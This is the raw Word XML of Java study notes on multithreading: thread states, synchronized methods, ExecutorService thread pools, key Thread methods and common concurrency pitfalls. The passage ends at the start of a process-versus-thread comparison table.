    <w:p w14:paraId="1329C459" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread is in this state when it is created but has not yet started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E4081" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After calling start(), the thread becomes runnable. It can be running or waiting for CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD7B36" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters the blocked state when it wants to access a resource that another thread is using (e.g., waiting for a lock).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CCCB77" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters this state when it is waiting for another thread to perform a particular action (e.g., wait(), join()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A67004" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Terminated</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters this state once its run() method has finished executing or when it is stopped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542436D9" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C59042B"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In multithreaded applications, multiple threads may attempt to access shared resources, potentially causing data inconsistency or corruption. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that only one thread can access a resource at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E019739"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1348FD"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3DF3D" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F7EC05"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 Synchronized method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562652E2"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public synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746847E"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075587D4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77489060" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D7B434"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28F626"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177DFAD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECCE1CF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FFCCF8" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pools (Executors):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346708DB"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Managing threads manually can be challenging, especially when there are many threads. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executor framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simplifies thread management by providing thread pools. These pools manage a collection of worker threads for executing tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB8D53"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import java.util.concurrent.ExecutorService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9AC33"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import java.util.concurrent.Executors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5014E3" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3E4C1D"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public class ThreadPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FAD3EB"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0C0F9"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ExecutorService executor = Executors.newFixedThreadPool(3);  // Create a pool of 3 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61181228" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737D728D"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA08C40"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System.out.println("Task 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603144FF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30CAFE" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E862BE"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7520DF26"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System.out.println("Task 2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DA3A1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511AFD7A" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137B0EAF"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF0F7C"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System.out.println("Task 3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583205ED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121A34EF" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126D7484"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 xml:space="preserve">        executor.shutdown();  // Shutdown the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1BAE91"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04B683" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA7E27" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Methods of Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512691B5" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>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start(): Starts the thread and invokes its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0AA0A" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>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sleep(long millis): Pauses the current thread for the specified time in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477820F1" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>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join(): Makes the calling thread wait until the thread on which it's called has finished executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66949930" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>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interrupt(): Interrupts a thread that is either sleeping or waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5A5E5" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common Multithreading Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A2BC4" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Race Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Occur when multiple threads access shared data concurrently, causing unpredictable results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EDD57F" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Happens when two or more threads are blocked forever because they are waiting for each other to release resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46243411" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Occurs when one or more threads are blocked indefinitely, not getting enough CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE3C3A" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8964EC" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multithreading</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a powerful concept for improving performance and responsiveness in Java applications, especially in CPU-bound or I/O-bound tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F18248" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>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By using Java’s threading mechanisms, you can run tasks concurrently, ensuring optimal resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201FE81D" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Managing threads requires careful handling of synchronization, race conditions, and deadlocks to ensure the correctness of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA7672" w14:textId="3DD2592B" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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1E5F41B">
          <v:rect id="_x0000_i1813" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BB16F" w14:textId="61F3CADB" w:rsidR="006E1A00" w:rsidRPr="00CE4B95" w:rsidRDefault="007F64E6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_Toc196307738"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="006E1A00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between Process and Thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="13B7ECD9" w14:textId="06F8A71A" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are fundamental concepts in computer science, and both are used to perform tasks concurrently. However, they differ significantly in terms of their structure, execution, and resource management. Here’s a detailed comparis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4"/>
        <w:gridCol w:w="4333"/>
        <w:gridCol w:w="4257"/>
      </w:tblGrid>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="7782DA57" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1205EED7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376CCA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A875D1" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376CCA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Process</w:t>
            </w:r>
